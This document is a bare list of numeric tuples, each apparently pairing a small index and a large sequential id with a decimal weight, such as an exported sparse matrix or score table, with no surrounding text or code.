(245, 284773, 9.30981),
(245, 284774, 1.00331),
(245, 284775, 0.95669),
(245, 284776, 0.98),
(245, 284777, 1.09669),
(245, 284778, 0.95669),
(245, 284779, 0.91),
(245, 284780, 1.02669),
(245, 284781, 0.88669),
(245, 285055, 0.95669),
(245, 285056, 1.07331),
(245, 285057, 0.18669),
(306, 285057, 0.18669),
(245, 285058, 0.91),
(245, 285059, 1.00331),
(245, 285060, 0.28),
(245, 285061, 0.91),
(245, 285062, 1.00331),
(245, 285063, 0.37331),
(245, 285064, 1.00331),
(245, 285065, 1.14331),
(245, 285066, 4.56),
(245, 285067, 8.55),
(245, 285068, 10.0702),
(245, 285069, 1.00331),
(245, 285070, 1.09669),
(245, 285071, 0.88669),
(245, 285072, 0.28),
(245, 285073, 0.93331),
(245, 285074, 1.05),
(245, 285075, 0.95669),
(245, 285076, 1.14331),
(245, 285077, 1.07331),
(245, 285078, 1.21331),
(245, 285079, 0.95669),
(245, 285080, 1.07331),
(245, 285081, 1.02669),
(246, 285358, 1.05),
(246, 285359, 1.07331),
(246, 285360, 1.05),
(246, 285361, 1.02669),
(246, 285362, 1.09669),
(246, 285363, 0.86331),
(246, 285364, 0.93331),
(246, 285365, 0.86331),
(246, 285366, 0.91),
(246, 285367, 1.09669),
(246, 285368, 0.86331),
(246, 285369, 0.98),
(246, 285370, 0.86331),
(246, 285371, 0.95669),
(246, 285372, 1.12),
(246, 285373, 0.86331),
(246, 285374, 1.00331),
(246, 285375, 1.12),
(246, 285376, 1.23669),
(246, 285377, 1.12),
(246, 285378, 0.91),
(246, 285379, 0.98),
(246, 285380, 1.00331),
(246, 285381, 1.19),
(246, 285382, 1.14331),
(305, 285382, 1.14331),
(246, 285383, 0.32669),
(246, 285384, 0.98),
(246, 285385, 1.05),
(246, 285386, 1.05),
(246, 285387, 1.14331),
(246, 285388, 0.37331),
(246, 285389, 0.98),
(246, 285390, 1.09669),
(246, 285391, 1.12),
(246, 285392, 0.98),
(246, 285393, 0.98),
(246, 285394, 1.05),
(246, 285395, 0.84),
(246, 285396, 0.95669),
(246, 285397, 1.00331),
(246, 285398, 1.05),
(246, 285399, 0.88669),
(246, 285400, 0.98),
(246, 285401, 0.95669),
(246, 285762, 0.98),
(306, 285762, 0.98),
(246, 285763, 1.05),
(246, 285764, 1.09669),
(246, 285765, 1.16669),
(246, 285766, 1.07331),
(246, 285767, 1.14331),
(246, 285768, 1.02669),
(246, 285769, 1.21331),
(246, 285770, 0.98),
(246, 285771, 1.05),
(246, 285772, 1.02669),
(246, 285773, 1.14331),
(246, 285774, 1.02669),
(246, 285775, 1.28331),
(246, 285776, 0.88669),
(246, 285777, 1.05),
(246, 285778, 1.07331),
(246, 285779, 1.21331),
(246, 285780, 1.02669),
(246, 285781, 1.16669),
(246, 285782, 0.42),
(246, 285783, 0.95669),
(246, 285784, 1.00331),
(246, 285785, 0.86331),
(246, 285786, 0.93331),
(246, 285787, 0.56),
(246, 285788, 0.93331),
(246, 285789, 1.05),
(246, 285790, 0.95669),
(246, 285791, 1.02669),
(246, 285792, 0.46669),
(246, 285793, 1.14331),
(246, 285794, 1.26),
(246, 285795, 0.93331),
(246, 285796, 1.05),
(246, 285797, 1.00331),
(246, 285798, 1.21331),
(246, 285799, 0.91),
(246, 285800, 1.02669),
(246, 285801, 1.16669),
(246, 285802, 0.91),
(246, 285803, 0.98),
(246, 285804, 0.95669),
(246, 285805, 0.91),
(246, 285806, 0.98),
(246, 285807, 0.88669),
(246, 285808, 0.95669),
(246, 285809, 0.95669),
(246, 285810, 1.02669),
(246, 285811, 1.05),
(246, 285812, 1.14331),
(246, 285813, 1.02669),
(246, 285814, 1.23669),
(246, 285815, 0.37331),
(246, 285816, 0.95669),
(246, 285817, 1.02669),
(247, 286413, 0.81669),
(290, 286413, 1.63338),
(247, 286414, 0.88669),
(290, 286414, 1.77338),
(247, 286415, 1.07331),
(247, 286416, 1.02669),
(247, 286417, 0.91),
(247, 286418, 1.09669),
(247, 286419, 0.91),
(247, 286420, 1.09669),
(247, 286421, 0.65338),
(247, 286422, 0.95669),
(247, 286423, 1.14331),
(247, 286424, 1.07331),
(247, 286425, 1.16669),
(247, 286426, 0.86331),
(247, 286427, 0.93331),
(247, 286428, 0.95669),
(247, 286429, 0.84),
(247, 286430, 0.98),
(247, 286431, 0.95669),
(247, 286432, 1.12),
(247, 286433, 0.98),
(247, 286434, 0.18669),
(247, 286435, 0.84),
(247, 286436, 0.98),
(247, 286437, 1.68),
(247, 286438, 0.93331),
(247, 286439, 0.93331),
(247, 286440, 0.95669),
(247, 286441, 1.16669),
(247, 286442, 1.02669),
(247, 286443, 1.09669),
(247, 286444, 1.72662),
(247, 286445, 0.98),
(247, 286446, 0.93331),
(247, 286447, 1.00331),
(247, 286448, 1.12),
(247, 286449, 1.00331),
(247, 286450, 1.09669),
(247, 286451, 0.91),
(247, 286452, 0.98),
(247, 286453, 0.98),
(247, 286454, 1.09669),
(247, 286455, 0.84),
(306, 286455, 0.84),
(247, 286456, 0.93331),
(247, 286457, 0.95669),
(247, 286458, 0.42),
(247, 286459, 1.02669),
(247, 286460, 1.12),
(247, 286461, 1.09669),
(247, 286704, 1.86662),
(247, 286705, 0.88669),
(247, 286706, 1.02669),
(247, 286707, 0.93331),
(247, 286708, 1.05),
(247, 286709, 0.98),
(247, 286710, 1.05),
(247, 286711, 0.42),
(247, 286712, 1.02669),
(247, 286713, 1.07331),
(247, 286714, 0.98),
(247, 286715, 1.16669),
(247, 286716, 1.02669),
(247, 286717, 1.02669),
(247, 286718, 1.09669),
(247, 286719, 1.09669),
(247, 286720, 1.00331),
(247, 286721, 1.16669),
(248, 287337, 0.95669),
(248, 287338, 1.12),
(248, 287339, 1.07331),
(248, 287340, 1.00331),
(248, 287341, 0.93331),
(248, 287342, 1.09669),
(248, 287343, 1.02669),
(248, 287344, 1.16669),
(248, 287345, 1.12),
(248, 287346, 1.12),
(248, 287347, 1.00331),
(248, 287348, 1.12),
(248, 287349, 0.93331),
(248, 287350, 1.02669),
(248, 287351, 0.93331),
(248, 287352, 1.00331),
(248, 287353, 8.96),
(248, 287354, 1.09669),
(248, 287355, 0.91),
(248, 287356, 0.91),
(248, 287357, 1.12),
(248, 287358, 0.98),
(248, 287359, 1.05),
(248, 287360, 0.98),
(248, 287361, 1.23669),
(248, 287362, 0.91),
(248, 287363, 1.00331),
(248, 287364, 1.00331),
(248, 287365, 0.98),
(248, 287366, 1.00331),
(248, 287367, 1.00331),
(248, 287368, 1.09669),
(248, 287369, 1.05),
(248, 287370, 1.26),
(248, 287371, 0.88669),
(248, 287372, 1.02669),
(248, 287668, 1.02669),
(248, 287669, 1.12),
(248, 287670, 0.98),
(248, 287671, 1.26),
(248, 287672, 0.51331),
(248, 287673, 1.16669),
(248, 287674, 1.23669),
(248, 287675, 0.86331),
(248, 287676, 0.98),
(248, 287677, 0.91),
(248, 287678, 1.12),
(248, 287679, 0.93331),
(248, 287680, 1.14331),
(248, 287681, 0.93331),
(248, 287682, 1.14331),
(248, 287683, 0.86331),
(248, 287684, 1.07331),
(248, 287685, 0.88669),
(248, 287686, 0.98),
(248, 287687, 0.88669),
(248, 287688, 0.98),
(248, 287689, 1.00331),
(248, 287690, 1.00331),
(248, 287691, 0.98),
(248, 287692, 1.07331),
(248, 287693, 0.98),
(290, 287693, 0.98),
(248, 287694, 1.09669),
(248, 287695, 1.02669),
(248, 287696, 1.23669),
(248, 287697, 0.95669),
(290, 287697, 0.95669),
(248, 287698, 1.07331),
(248, 287699, 1.00331),
(248, 287700, 1.14331),
(248, 287701, 1.12),
(248, 287702, 1.23669),
(248, 287703, 1.05),
(248, 287704, 0.91),
(248, 287705, 1.00331),
(249, 288369, 0.88669),
(287, 288369, 0.88669),
(249, 288370, 1.05),
(249, 288371, 0.86331),
(249, 288372, 0.95669),
(249, 288373, 0.81669),
(249, 288374, 0.93331),
(249, 288375, 0.95669),
(249, 288376, 0.86331),
(249, 288377, 1.00331),
(249, 288378, 0.91),
(249, 288379, 1.02669),
(249, 288380, 1.00331),
(249, 288381, 1.14331),
(249, 288382, 0.91),
(249, 288383, 0.98),
(249, 288384, 0.51331),
(249, 288385, 1.05),
(249, 288386, 1.09669),
(249, 288387, 0.88669),
(249, 288388, 0.95669),
(249, 288389, 0.93331),
(249, 288390, 1.00331),
(249, 288391, 0.93331),
(249, 288392, 1.14331),
(249, 288393, 0.91),
(249, 288394, 1.05),
(249, 288395, 0.95669),
(249, 288396, 1.05),
(249, 288397, 3.19992),
(249, 288398, 1.02669),
(249, 288399, 2.55),
(249, 288400, 0.95669),
(249, 288401, 0.86331),
(249, 288402, 0.98),
(249, 288403, 1.02669),
(249, 288404, 0.88669),
(292, 288404, 0.88669),
(249, 288405, 1.00331),
(249, 288406, 0.95669),
(249, 288407, 1.14331),
(249, 288408, 1.12),
(249, 288409, 1.09669),
(249, 288410, 1.00331),
(299, 288410, 1.00331),
(249, 288411, 0.93331),
(249, 288412, 0.93331),
(249, 288413, 1.09669),
(249, 288414, 0.51331),
(249, 288415, 1.02669),
(249, 288416, 1.12),
(249, 288417, 0.32669),
(249, 288418, 0.93331),
(249, 288419, 1.26),
(249, 288719, 0.23331),
(249, 288720, 0.91),
(249, 288721, 1.02669),
(249, 288722, 0.37331),
(306, 288722, 0.37331),
(249, 288723, 0.95669),
(249, 288724, 1.05),
(249, 288725, 0.95669),
(249, 288726, 0.91),
(249, 288727, 1.02669),
(249, 288728, 0.93331),
(249, 288729, 0.93331),
(249, 288730, 1.02669),
(249, 288731, 0.23331),
(249, 288732, 0.95669),
(249, 288733, 1.05),
(249, 288734, 0.91),
(249, 288735, 0.95669),
(249, 288736, 0.98),
(249, 288737, 1.07331),
(250, 289341, 0.93324),
(250, 289342, 0.88669),
(250, 289343, 1.05),
(250, 289344, 0.93331),
(250, 289345, 1.07331),
(250, 289346, 1.00331),
(250, 289347, 1.16669),
(250, 289348, 0.91),
(250, 289349, 1.07331),
(250, 289375, 0.14),
(250, 289376, 0.93331),
(250, 289377, 1.05),
(251, 289454, 2.00662),
(251, 289455, 2.24),
(251, 289456, 2.87007),
(251, 289457, 3.29007),
(251, 289458, 0.98),
(251, 289459, 1.16669),
(251, 289460, 0.69993),
(251, 289461, 0.91),
(251, 289462, 1.07331),
(251, 289463, 0.91),
(251, 289464, 1.07331),
(251, 289465, 0.93331),
(251, 289466, 1.09669),
(252, 289530, 2.00662),
(252, 289531, 1.09669),
(252, 289532, 1.07331),
(252, 289533, 2.1),
(252, 289534, 1.86662),
(252, 289535, 2.1),
(252, 289536, 0.88669),
(305, 289536, 0.88669),
(252, 289537, 0.95669),
(252, 289538, 0.95669),
(252, 289539, 1.07331),
(252, 289540, 0.88669),
(252, 289541, 1.00331),
(252, 289542, 1.02669),
(305, 289542, 1.02669),
(252, 289543, 1.09669),
(305, 289544, 0.0175),
(252, 289544, 0.14),
(290, 289544, 0.14),
(252, 289545, 0.88669),
(305, 289545, 0.88669),
(252, 289546, 0.95669),
(252, 289547, 0.84),
(252, 289548, 0.98),
(252, 289549, 0.88669),
(252, 289550, 1.05),
(252, 289551, 0.98),
(252, 289552, 0.98),
(252, 289553, 0.98),
(252, 289554, 1.00331),
(252, 289555, 1.00331),
(252, 289556, 0.91),
(252, 289557, 1.00331),
(252, 289558, 0.93331),
(252, 289559, 1.00331),
(252, 289560, 0.88669),
(252, 289561, 1.02669),
(252, 289562, 0.95669),
(252, 289563, 1.02669),
(252, 289564, 0.98),
(252, 289565, 1.16669),
(252, 289566, 1.00331),
(252, 289567, 1.09669),
(252, 289568, 1.00331),
(252, 289569, 1.05),
(252, 289570, 1.07331),
(252, 289571, 1.14331),
(252, 289572, 1.00331),
(252, 289573, 1.07331),
(252, 289574, 0.95669),
(252, 289575, 1.02669),
(252, 289576, 1.91338),
(252, 289577, 2.14662),
(252, 289578, 1.00331),
(252, 289579, 1.09669),
(252, 289580, 1.05),
(306, 289580, 1.05),
(252, 289581, 0.98),
(252, 289582, 1.05),
(252, 289583, 0.32669),
(306, 289583, 0.32669),
(252, 289584, 0.95669),
(252, 289585, 1.07331),
(252, 289586, 0.93331),
(252, 289587, 1.05),
(252, 289588, 0.91),
(252, 289589, 1.02669),
(252, 289590, 1.86662),
(252, 289591, 2.00662),
(252, 289592, 1.26),
(252, 289898, 1.07331),
(306, 289898, 1.07331),
(252, 289899, 0.95669),
(252, 289900, 1.05),
(252, 289901, 0.93331),
(252, 289902, 1.02669),
(252, 289903, 1.77338),
(252, 289904, 0.98),
(252, 289905, 1.00331),
(252, 289906, 0.88669),
(252, 289907, 1.00331),
(252, 289908, 0.95669),
(306, 289908, 0.95669),
(252, 289909, 1.02669),
(252, 289910, 0.93331),
(252, 289911, 1.00331),
(252, 289912, 0.81669),
(252, 289913, 1.00331),
(252, 289914, 0.95669),
(252, 289915, 1.07331),
(306, 289915, 1.07331),
(252, 289916, 0.98),
(252, 289917, 1.05),
(252, 289918, 0.95669),
(252, 289919, 1.05),
(252, 289920, 0.91),
(252, 289921, 1.00331),
(252, 289922, 0.95669),
(252, 289923, 1.05),
(252, 289924, 1.05),
(252, 289925, 0.91),
(252, 289926, 1.00331),
(252, 289927, 1.05),
(252, 289928, 1.21331),
(252, 289929, 0.91),
(252, 289930, 1.02669),
(252, 289931, 0.95669),
(252, 289932, 1.02669),
(252, 289933, 1.00331),
(252, 289934, 1.86662),
(252, 289935, 0.98),
(252, 289936, 1.02669),
(252, 289937, 0.46669),
(252, 289938, 1.14331),
(252, 289939, 1.21331),
(253, 290568, 0.84),
(253, 290569, 0.95669),
(253, 290570, 1.02669),
(253, 290571, 1.02669),
(253, 290572, 0.86331),
(253, 290573, 0.93331),
(253, 290574, 1.05),
(253, 290575, 0.91),
(253, 290576, 1.05),
(253, 290577, 0.93331),
(253, 290578, 1.00331),
(253, 290579, 0.84),
(253, 290580, 0.98),
(253, 290581, 1.02669),
(253, 290582, 0.93331),
(253, 290583, 1.05),
(253, 290584, 0.93331),
(253, 290585, 0.93331),
(253, 290586, 0.91),
(253, 290587, 1.05),
(253, 290588, 1.07331),
(253, 290589, 1.19),
(253, 290590, 0.32669),
(253, 290591, 1.05),
(253, 290592, 1.26),
(253, 290593, 1.19),
(253, 290594, 0.18669),
(253, 290595, 0.86331),
(253, 290596, 0.95669),
(253, 290597, 0.88669),
(253, 290598, 1.02669),
(253, 290599, 0.91),
(253, 290600, 1.09669),
(253, 290601, 1.02669),
(253, 290602, 1.12),
(253, 290603, 1.07331),
(253, 290604, 1.16669),
(253, 290605, 0.95669),
(253, 290606, 0.98),
(253, 290607, 1.05),
(253, 290608, 1.02669),
(253, 290609, 1.05),
(253, 290610, 0.95669),
(253, 290611, 1.07331),
(253, 290612, 1.07331),
(253, 290613, 0.88669),
(253, 290614, 0.98),
(253, 290615, 1.05),
(253, 290616, 1.02669),
(253, 290617, 1.14331),
(253, 290618, 0.93331),
(253, 290619, 0.91),
(253, 290620, 0.98),
(253, 290621, 1.82),
(253, 290622, 2.00662),
(253, 290623, 1.02669),
(253, 290624, 1.14331),
(253, 290625, 1.02669),
(253, 290626, 1.14331),
(253, 291057, 1.00331),
(253, 291058, 0.91),
(253, 291059, 0.95669),
(253, 291060, 0.91),
(253, 291061, 1.00331),
(253, 291062, 0.95669),
(253, 291063, 1.05),
(253, 291064, 1.12),
(253, 291065, 0.98),
(253, 291066, 1.14331),
(253, 291067, 0.88669),
(253, 291068, 1.00331),
(253, 291069, 0.32669),
(253, 291070, 0.95669),
(253, 291071, 1.05),
(253, 291072, 0.18669),
(253, 291073, 0.88669),
(253, 291074, 1.16669),
(253, 291075, 0.86331),
(253, 291076, 0.95669),
(253, 291077, 1.14331),
(253, 291078, 0.91),
(253, 291079, 1.00331),
(253, 291080, 0.88669),
(253, 291081, 1.02669),
(253, 291082, 0.95669),
(253, 291083, 0.84),
(253, 291084, 0.95669),
(253, 291085, 0.23331),
(253, 291086, 0.88669),
(253, 291087, 0.98),
(253, 291088, 0.95669),
(253, 291089, 1.12),
(253, 291090, 1.86662),
(253, 291091, 2.19338),
(253, 291092, 1.02669),
(253, 291093, 1.00331),
(253, 291094, 4.9),
(253, 291095, 0.93331),
(253, 291096, 1.00331),
(253, 291097, 0.28),
(253, 291098, 0.91),
(253, 291099, 1.00331),
(253, 291100, 0.91),
(253, 291101, 1.07331),
(253, 291102, 0.88669),
(253, 291103, 0.98),
(253, 291104, 1.12),
(253, 291105, 0.37331),
(253, 291106, 1.14331),
(253, 291107, 1.4),
(253, 291108, 0.28),
(253, 291109, 0.93331),
(253, 291110, 1.00331),
(254, 291595, 0.84),
(254, 291596, 0.93331),
(254, 291597, 0.91),
(254, 291598, 1.00331),
(254, 291599, 0.86331),
(254, 291600, 0.95669),
(305, 291601, 0.88669),
(254, 291601, 1.77338),
(254, 291602, 1.09669),
(254, 291603, 0.95669),
(254, 291604, 0.81669),
(254, 291605, 0.91),
(254, 291606, 0.84),
(254, 291607, 0.95669),
(254, 291608, 0.88669),
(254, 291609, 0.93331),
(254, 291610, 0.95669),
(254, 291611, 0.98),
(254, 291612, 1.02669),
(254, 291613, 0.93331),
(254, 291614, 0.88669),
(254, 291615, 0.95669),
(254, 291616, 0.98),
(254, 291617, 0.98),
(254, 291618, 1.09669),
(254, 291619, 1.95993),
(254, 291620, 1.09669),
(254, 291621, 1.23669),
(254, 291622, 1.09669),
(254, 291623, 1.19),
(254, 291624, 1.14331),
(254, 291625, 1.30669),
(254, 291626, 0.93331),
(254, 291627, 1.09669),
(254, 291628, 0.93338),
(254, 291629, 1.07331),
(254, 291630, 1.16669),
(254, 291631, 1.02669),
(254, 291632, 1.14331),
(254, 291633, 0.65338),
(254, 291634, 0.95669),
(254, 291635, 1.07331),
(254, 291636, 0.98),
(254, 291637, 1.07331),
(254, 291638, 1.05),
(254, 291639, 1.12),
(254, 291640, 1.77338),
(254, 291641, 1.91338),
(254, 291642, 0.95669),
(254, 291643, 1.21331),
(254, 291644, 1.05),
(254, 291645, 0.98),
(254, 291646, 1.05),
(254, 291647, 1.05),
(254, 291648, 1.16669),
(254, 291649, 0.95669),
(254, 291650, 1.02669),
(254, 291651, 1.77338),
(254, 291652, 0.98),
(254, 291653, 0.98),
(254, 291654, 0.84),
(254, 291655, 0.98),
(254, 291656, 0.98),
(254, 291657, 1.00331),
(254, 291658, 1.12),
(254, 291659, 1.02669),
(254, 291660, 1.05),
(254, 291661, 0.95669),
(304, 291661, 0.95669),
(254, 291662, 0.86331),
(254, 291663, 1.02669),
(254, 291664, 0.93331),
(254, 291665, 1.02669),
(254, 291666, 0.93331),
(254, 291667, 1.07331),
(254, 291668, 1.14331),
(254, 291669, 1.00331),
(254, 291670, 1.00331),
(254, 291671, 0.93331),
(254, 291672, 1.02669),
(254, 291673, 0.98),
(254, 291674, 1.02669),
(254, 291675, 1.12),
(254, 291676, 0.98),
(254, 291677, 1.19),
(254, 291678, 1.07331),
(254, 291679, 0.98),
(254, 291680, 1.07331),
(254, 291681, 0.91),
(295, 291681, 0.91),
(254, 291682, 1.00331),
(254, 291683, 0.95669),
(254, 291684, 1.05),
(254, 291685, 1.05),
(254, 291686, 0.23331),
(254, 291687, 0.88669),
(254, 291688, 1.00331),
(254, 291689, 1.07331),
(254, 291690, 0.95669),
(254, 291691, 1.02669),
(254, 291692, 1.72662),
(254, 291693, 1.09669),
(254, 291694, 1.02669),
(254, 291695, 0.32669),
(254, 291696, 1.05),
(254, 291697, 1.19),
(254, 291698, 1.16669),
(254, 291699, 1.00331),
(254, 292260, 5.0668),
(254, 292261, 5.4668),
(254, 292262, 0.86331),
(254, 292263, 1.00331),
(254, 292264, 0.91),
(254, 292265, 1.02669),
(254, 292266, 1.96),
(254, 292267, 1.07331),
(254, 292268, 1.19),
(254, 292269, 0.98),
(254, 292270, 1.05),
(254, 292271, 0.42),
(254, 292272, 0.98),
(254, 292273, 1.12),
(254, 292274, 0.91),
(254, 292275, 1.00331),
(254, 292276, 1.07331),
(254, 292277, 1.16669),
(254, 292278, 0.91),
(254, 292279, 1.02669),
(254, 292280, 1.05),
(254, 292281, 1.14331),
(254, 292282, 1.02669),
(254, 292283, 1.00331),
(254, 292284, 1.19),
(254, 292285, 2.52),
(254, 292286, 1.12),
(254, 292287, 1.09669),
(254, 292288, 2.1),
(254, 292289, 1.02669),
(254, 292290, 1.14331),
(254, 292291, 3.15),
(254, 292292, 4.38676),
(254, 292293, 1.07331),
(254, 292294, 1.09669),
(254, 292295, 0.98),
(305, 292295, 0.98),
(254, 292296, 1.05),
(254, 292297, 1.02669),
(254, 292298, 1.19),
(254, 292299, 0.95669),
(304, 292299, 0.95669),
(254, 292300, 1.07331),
(254, 292301, 0.95669),
(254, 292302, 1.07331),
(254, 292303, 1.07331),
(254, 292304, 0.95669),
(254, 292305, 1.07331),
(254, 292306, 1.07331),
(254, 292307, 1.14331),
(254, 292308, 1.00331),
(254, 292309, 1.05),
(254, 292310, 1.26),
(254, 292311, 0.23331),
(254, 292312, 0.98),
(254, 292313, 1.05),
(254, 292314, 0.37331),
(254, 292315, 0.95669),
(254, 292316, 1.07331),
(254, 292317, 1.02669),
(254, 292318, 1.16669),
(255, 292622, 0.84),
(255, 292623, 0.95669),
(255, 292624, 0.91),
(255, 292625, 1.00331),
(255, 292626, 0.93331),
(255, 292627, 1.09669),
(255, 292628, 0.95669),
(255, 292629, 1.07331),
(255, 292630, 0.93331),
(255, 292631, 1.00331),
(255, 292632, 0.46669),
(255, 292633, 1.00331),
(255, 292634, 1.12),
(255, 292635, 0.93331),
(255, 292636, 1.16669),
(255, 292637, 0.98),
(255, 292638, 1.05),
(255, 292639, 0.95669),
(255, 292640, 1.07331),
(255, 292641, 0.95669),
(255, 292642, 0.91),
(255, 292643, 1.02669),
(255, 292644, 0.93331),
(255, 292645, 1.00331),
(255, 292646, 1.02669),
(255, 292647, 1.16669),
(255, 292648, 0.23331),
(287, 292648, 0.23331),
(255, 292649, 0.93331),
(287, 292649, 0.93331),
(255, 292650, 1.02669),
(255, 292651, 0.88669),
(255, 292652, 0.95669),
(255, 292653, 0.95669),
(255, 292654, 1.05),
(255, 292655, 0.95669),
(255, 292656, 1.12),
(255, 292657, 0.93331),
(255, 292658, 1.09669),
(255, 292659, 0.98),
(255, 292660, 0.95669),
(255, 292661, 1.02669),
(255, 292928, 0.84),
(255, 292929, 0.98),
(255, 292930, 0.84),
(255, 292931, 1.05),
(255, 292932, 0.86331),
(255, 292933, 1.12),
(255, 292934, 1.05),
(255, 292935, 1.16669),
(255, 292936, 0.88669),
(255, 292937, 0.88669),
(255, 292938, 0.98),
(255, 292939, 0.93331),
(255, 292940, 1.05),
(255, 292941, 0.91),
(255, 292942, 1.02669),
(255, 292943, 0.28),
(255, 292944, 0.93331),
(255, 292945, 1.07331),
(255, 292946, 0.93331),
(255, 292947, 1.09669),
(255, 292948, 0.88669),
(255, 292949, 0.93331),
(255, 292950, 1.00331),
(255, 292951, 1.16669),
(255, 292952, 0.88669),
(305, 292952, 0.88669),
(255, 292953, 1.00331),
(255, 292954, 1.05),
(255, 292955, 1.14331),
(255, 292956, 0.91),
(255, 292957, 0.98),
(255, 292958, 0.98),
(255, 292959, 1.12),
(255, 292960, 1.02669),
(255, 292961, 1.14331),
(255, 292962, 0.98),
(304, 292962, 0.98),
(255, 292963, 0.93331),
(255, 292964, 1.05),
(255, 292965, 1.09669),
(255, 292966, 0.95669),
(255, 292967, 1.02669),
(255, 292968, 1.05),
(255, 292969, 0.46662),
(255, 292970, 0.88669),
(255, 292971, 0.95669),
(255, 292972, 0.93331),
(255, 292973, 1.00331),
(256, 293129, 0.95669),
(256, 293130, 1.02669),
(256, 293131, 0.95669),
(256, 293132, 0.93331),
(256, 293133, 1.00331),
(256, 293134, 0.98),
(256, 293135, 1.07331),
(256, 293136, 0.46669),
(256, 293137, 1.00331),
(256, 293138, 1.07331),
(256, 293139, 1.09669),
(256, 293140, 0.32669),
(256, 293141, 0.95669),
(256, 293142, 1.21331),
(256, 293143, 0.93331),
(256, 293144, 1.00331),
(256, 293145, 0.98),
(256, 293146, 1.05),
(256, 293147, 1.09669),
(256, 293148, 0.93331),
(256, 293149, 1.19),
(256, 293150, 0.93331),
(256, 293151, 1.02669),
(256, 293152, 0.98),
(256, 293153, 1.05),
(256, 293154, 1.07331),
(256, 293155, 1.14331),
(256, 293156, 0.98),
(288, 293156, 0.98),
(306, 293156, 0.98),
(256, 293157, 1.07331),
(256, 293158, 0.93331),
(256, 293159, 1.19),
(256, 293160, 0.37331),
(256, 293161, 0.98),
(256, 293162, 1.07331),
(256, 293163, 1.02669),
(256, 293164, 1.09669),
(256, 293165, 0.93331),
(256, 293166, 1.07331),
(256, 293167, 1.09669),
(256, 293168, 0.95669),
(256, 293169, 1.05),
(256, 293170, 1.07331),
(256, 293171, 1.19),
(256, 293172, 0.88669),
(256, 293173, 1.00331),
(256, 293174, 1.02669),
(256, 293175, 1.00331),
(256, 293176, 1.02669),
(256, 293177, 1.21331),
(256, 293178, 0.91),
(256, 293179, 0.98),
(256, 293180, 1.07331),
(256, 293181, 1.07331),
(256, 293182, 0.86331),
(256, 293183, 1.02669),
(256, 293184, 1.05),
(256, 293185, 1.12),
(256, 293186, 0.95669),
(256, 293187, 1.07331),
(256, 293188, 0.91),
(256, 293189, 1.02669),
(256, 293190, 1.05),
(256, 293191, 0.98),
(256, 293192, 0.93331),
(256, 293193, 1.02669),
(256, 293588, 0.88669),
(256, 293589, 1.05),
(256, 293590, 0.86331),
(256, 293591, 0.98),
(256, 293592, 0.91),
(256, 293593, 1.05),
(256, 293594, 0.91),
(256, 293595, 1.00331),
(256, 293596, 0.86331),
(256, 293597, 1.00331),
(256, 293598, 0.91),
(256, 293599, 1.00331),
(256, 293600, 0.14),
(256, 293601, 0.86331),
(256, 293602, 0.95669),
(256, 293603, 0.84),
(256, 293604, 0.93331),
(256, 293605, 0.18669),
(256, 293606, 0.88669),
(256, 293607, 1.02669),
(256, 293608, 0.93331),
(256, 293609, 1.07331),
(256, 293610, 0.46669),
(256, 293611, 1.02669),
(256, 293612, 1.21331),
(256, 293613, 0.32669),
(256, 293614, 0.98),
(256, 293615, 1.09669),
(256, 293616, 0.91),
(256, 293617, 1.12),
(256, 293618, 0.95669),
(256, 293619, 1.09669),
(256, 293620, 1.00331),
(256, 293621, 1.12),
(256, 293622, 0.88669),
(256, 293623, 0.95669),
(257, 294138, 0.95669),
(257, 294139, 0.81669),
(257, 294140, 0.93331),
(257, 294141, 0.98),
(257, 294142, 1.09669),
(257, 294143, 0.86331),
(288, 294143, 0.86331),
(257, 294144, 0.98),
(257, 294145, 0.95669),
(306, 294145, 1.91338),
(257, 294146, 1.02669),
(257, 294147, 1.00331),
(257, 294148, 0.98),
(257, 294149, 0.86331),
(257, 294150, 1.02669),
(257, 294151, 0.93331),
(257, 294152, 1.00331),
(257, 294153, 1.00331),
(257, 294154, 0.98),
(257, 294155, 1.16669),
(257, 294156, 0.37331),
(257, 294157, 1.00331),
(257, 294158, 1.12),
(257, 294159, 0.23331),
(257, 294160, 0.95669),
(257, 294161, 1.05),
(257, 294162, 1.14331),
(257, 294163, 0.93331),
(257, 294164, 1.05),
(257, 294165, 0.98),
(257, 294166, 1.19),
(257, 294167, 0.98),
(257, 294168, 1.09669),
(257, 294169, 0.98),
(257, 294170, 1.12),
(257, 294171, 1.05),
(257, 294172, 1.09669),
(257, 294173, 0.93331),
(305, 294173, 0.93331),
(257, 294174, 0.95669),
(257, 294175, 0.95669),
(257, 294176, 0.93331),
(257, 294177, 1.02669),
(257, 294178, 0.95669),
(257, 294179, 1.02669),
(257, 294180, 1.12),
(257, 294181, 1.14331),
(257, 294182, 0.98),
(257, 294183, 1.05),
(257, 294184, 0.93331),
(257, 294185, 0.95669),
(257, 294186, 0.95669),
(257, 294187, 1.09669),
(257, 294188, 0.93331),
(257, 294189, 1.02669),
(257, 294190, 0.91),
(257, 294191, 0.32669),
(257, 294192, 0.93331),
(257, 294193, 1.14331),
(257, 294194, 1.14331),
(257, 294195, 1.14331),
(257, 294196, 0.84),
(290, 294196, 0.84),
(257, 294197, 0.98),
(257, 294198, 1.12),
(257, 294536, 0.86331),
(257, 294537, 0.98),
(257, 294538, 0.91),
(257, 294539, 1.05),
(257, 294540, 0.98),
(257, 294541, 1.05),
(257, 294542, 1.09669),
(257, 294543, 0.37331),
(257, 294544, 0.98),
(257, 294545, 1.19),
(257, 294546, 0.37331),
(257, 294547, 0.98),
(257, 294548, 1.19),
(257, 294549, 0.95669),
(257, 294550, 1.09669),
(257, 294551, 0.93331),
(257, 294552, 1.02669),
(257, 294553, 0.88669),
(257, 294554, 1.00331),
(257, 294555, 0.91),
(257, 294556, 1.02669),
(257, 294557, 1.02669),
(257, 294558, 0.95669),
(257, 294559, 1.05),
(257, 294560, 1.09669),
(257, 294561, 0.95669),
(257, 294562, 1.07331),
(257, 294563, 0.23331),
(257, 294564, 0.98),
(257, 294565, 1.05),
(257, 294566, 1.14331),
(257, 294567, 1.23669),
(257, 294568, 0.93331),
(257, 294569, 1.12),
(257, 294570, 1.07331),
(257, 294571, 1.02669),
(257, 294572, 0.95669),
(257, 294573, 1.07331),
(257, 294574, 1.91338),
(257, 294575, 2.33338),
(257, 294576, 1.05),
(257, 294577, 1.14331),
(258, 295179, 0.91),
(258, 295180, 1.00331),
(258, 295181, 0.93331),
(258, 295182, 1.05),
(258, 295183, 1.00331),
(258, 295184, 0.93331),
(258, 295185, 1.05),
(258, 295186, 3.15),
(258, 295187, 0.98),
(258, 295188, 1.09669),
(258, 295189, 0.93331),
(258, 295190, 1.05),
(258, 295191, 1.02669),
(258, 295192, 1.09669),
(258, 295193, 0.95669),
(258, 295194, 1.02669),
